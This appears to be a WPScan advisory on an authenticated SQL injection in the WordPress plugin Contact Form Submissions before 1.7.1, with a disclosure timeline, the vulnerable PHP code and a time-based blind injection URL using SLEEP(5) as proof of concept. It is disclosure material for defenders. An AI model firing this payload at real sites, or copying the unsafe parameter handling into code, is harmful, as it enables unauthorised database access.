WordPress Plugin Vulnerabilities
Contact Form Submissions < 1.7.1 - Authenticated SQL Injection
Description
The wpcf7_contact_form GET parameter is vulnerable to SQL injection when submitting a filter request as a high privilege user (admin+)
Edit (WPScanTeam)
September 28th, 2020 - Escalated to WP & WP Investigating
October 26th, 2020 - Received another submission related a SQL injection in the same parameter but with a different vector: https://wpscan.com/vulnerability/0c3a91d4-a75a-4107-bfc5-015590a72abe
January 3rd, 2021 - No updates, disclosing
March 29th, 2021 - v1.7 released to attempt to remediate the issue using sanitize_text_field(), which does not fix the SQL injection
April 7th, 2021 - v1.7.1 released, fixing the issue
Proof of Concept
if (isset($_GET['wpcf7_contact_form']) && !empty($_GET['wpcf7_contact_form'])) {
$form_id = esc_attr($_GET['wpcf7_contact_form']);
$wpcf7s_columns = $this->get_available_columns($form_id);
https://asciinema.org/a/ek0gA455FfKoukISs4AxTxJ5E
https://example.com/wp-admin/edit.php?post_status=all&post_type=wpcf7s&wpcf7_contact_form=(SELECT+42+FROM+(SELECT(SLEEP(5)))aa)&filter_action=Filter&paged=1
Affects Plugins
Fixed in 1.7.1 References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
minhtuanact + vigov5 SunCSR
Submitter
Minh Tuan
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-01-03 (about 3 years ago)
Added
2021-01-03 (about 3 years ago)
Last Updated
2021-04-08 (about 3 years ago)
WPScan 